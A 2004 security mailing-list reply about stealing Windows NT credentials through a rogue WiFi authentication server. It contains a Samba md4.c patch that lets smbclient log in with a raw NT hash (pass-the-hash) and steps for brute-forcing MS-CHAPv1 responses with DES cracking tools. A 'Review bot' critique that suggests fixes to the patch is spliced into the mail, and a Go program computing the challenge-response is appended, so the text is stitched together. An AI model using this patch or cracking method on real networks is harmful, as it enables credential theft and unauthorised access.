Re[2]: Stealing NT passwords through WiFi?

From: 3APA3A (3APA3A_at_SECURITY.NNOV.RU)
Date: 05/20/04

    Date: Thu, 20 May 2004 21:46:49 +0400
    To: Ugen <ugen@xonix.com>
    
    

    Dear Ugen,

    --Thursday, May 20, 2004, 7:31:38 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

    >>
    >>
    U> I am under the impression that as an authentication server the rogue system
    U> can require any version of
    U> MS-CHAP it chooses. If the original system is configured to support both
    U> (and XP supplicant does,
    U> not even sure if there is an easy way to force v2 only) the reply will

    I have no Wi-Fi to check; for a dialup connection you can (advanced
    settings of the security option for the connection).

    U> include LM hash. Got to test
    U> that, of course.

    It depends on security settings. Group policy (or local security policy)
    can prevent the system from handshaking the LM response and from storing
    the LM hash.

    >>It doesn't matter if you recover the cleartext password by bruteforcing
    >>the password or you recover the password hash by cracking DES, because
    >>with the password hash you can connect to any resource without the
    >>cleartext password.
    >>
    >>
    U> I took a shortcut in description here indeed :) This is the crucial
    U> point though - I haven't found
    U> ready-made tools to work this step, though there was mention somewhere

    I patched md4.c from the Samba distribution to convert from hex instead of
    hashing the password (the NT hash is actually MD4 of the Unicode password)
    if already given something like a hash (32 Unicode [0-9A-F] characters).
    This small patch allows using smbclient with a hash in hex instead of a
    cleartext password.

            D = 0x10325476;
    +
    +
    + if(n == 64){
    + int j;
    + unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
    + for(j = 0; j<16; j++){
    + if(!strchr(hexd, in[(j<<2)]))break;
    + if(in[(j<<2)+1])break;
    + if(!strchr(hexd, in[(j<<2)+2]))break;
    + if(in[(j<<2)+3])break;
    + out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
    + out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
    + }
    + if(j == 16) {
    + return;
    + }
    + }
                                                                                    
            while (n > 64) {
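    Review bot: the digit check in the `n == 64` branch accepts a NUL byte as a hex digit, because `strchr(hexd, in[(j<<2)])` returns a pointer to the terminating '\0' of hexd rather than NULL, so a zero low byte passes `if(!strchr(hexd, in[(j<<2)]))break;` and `strchr(hexd, in[(j<<2)]) - (char *)hexd` evaluates to 16, silently corrupting that nibble of `out`; compare the byte against '\0' before the lookup (or use memchr over the 16 digits). Smaller points: `hexd` is declared `unsigned char *` but passed to strchr without the `(char *)` cast used in the subtraction, so the build warns on pointer signedness; only uppercase digits are recognised, so a lowercase hash is quietly hashed as a password instead of being used as a hash; and any genuine 32-character uppercase-hex password takes the same early `return;`, which deserves a comment or an explicit option rather than overloading the password argument.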

    U> that l0phtcrack is able
    U> to use MS-CHAP (no version specified) data as an input. This is where
    U> I'd welcome good
    U> suggestions.

    Any NTLM cracking tool is OK for MS-CHAPv1. For DES bruteforcing you can
    use any DES cracking tool, like john-the-ripper, with the challenge as a
    salt and each 8 bytes of the response as a crypted password. The first 16
    of the resulting 21 bytes are the password hash. Approx. half a year is
    required to crack 3 DES portions on a single PC (because full bruteforcing
    is required) with a fast "sliced" DES implementation. The test code I
    wrote works too slowly, because it used standard DES.

    -- 
    ~/ZARAZA
    I will not need a sting (S. Lem)
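
The three-key DES construction described in the reply above (a 16-byte NT hash zero-padded to 21 bytes, each 7-byte slice DES-encrypting the same 8-byte challenge, so every 8-byte third of the response is a separate DES problem), as an added example in Go that is not code from the mail or from Samba. The function names `expandDESKey`, `KeySlices` and `ChallengeResponse` are this example's own; the hash and challenge in `main` are the NTOWFv1 of "Password" and the server challenge from the MS-NLMP test vectors, used here as constructed input.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// expandDESKey spreads 7 key bytes over the 8-byte DES key form and sets each
// byte's low bit to odd parity (crypto/des ignores parity; the protocol sets it).
func expandDESKey(k7 []byte) []byte {
	k := []byte{k7[0], k7[0]<<7 | k7[1]>>1, k7[1]<<6 | k7[2]>>2, k7[2]<<5 | k7[3]>>3,
		k7[3]<<4 | k7[4]>>4, k7[4]<<3 | k7[5]>>5, k7[5]<<2 | k7[6]>>6, k7[6] << 1}
	for i := range k {
		k[i] = k[i]&^1 | byte(1-bits.OnesCount8(k[i]>>1)%2)
	}
	return k
}

// KeySlices zero-pads the 16-byte NT hash to 21 bytes and returns the three
// 7-byte DES keys; the third holds only two hash bytes plus five zero bytes.
func KeySlices(ntHash []byte) [3][]byte {
	padded := make([]byte, 21)
	copy(padded, ntHash)
	return [3][]byte{padded[0:7], padded[7:14], padded[14:21]}
}

// ChallengeResponse computes the 24-byte MS-CHAPv1/NTLMv1 response: each key
// slice independently DES-encrypts the same 8-byte challenge, so every 8-byte
// third of the response depends only on its own 7 bytes of the padded hash.
func ChallengeResponse(ntHash, challenge []byte) []byte {
	resp := make([]byte, 0, 24)
	for _, k7 := range KeySlices(ntHash) {
		c, err := des.NewCipher(expandDESKey(k7))
		if err != nil {
			panic(err)
		}
		block := make([]byte, 8)
		c.Encrypt(block, challenge)
		resp = append(resp, block...)
	}
	return resp
}

func main() {
	// Constructed input: NTOWFv1 of "Password" and the server challenge from the MS-NLMP test vectors.
	ntHash, _ := hex.DecodeString("a4f49c406510bdcab6824ee7c30fd852")
	challenge, _ := hex.DecodeString("0123456789abcdef")
	resp := ChallengeResponse(ntHash, challenge)
	for i, k7 := range KeySlices(ntHash) {
		fmt.Printf("key %d %x -> response block %x\n", i+1, k7, resp[i*8:(i+1)*8])
	}
}
```

Flipping any of the last two hash bytes changes only the third response block, which is the independence the reply relies on when it feeds each 8-byte portion to a DES cracker separately.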
    
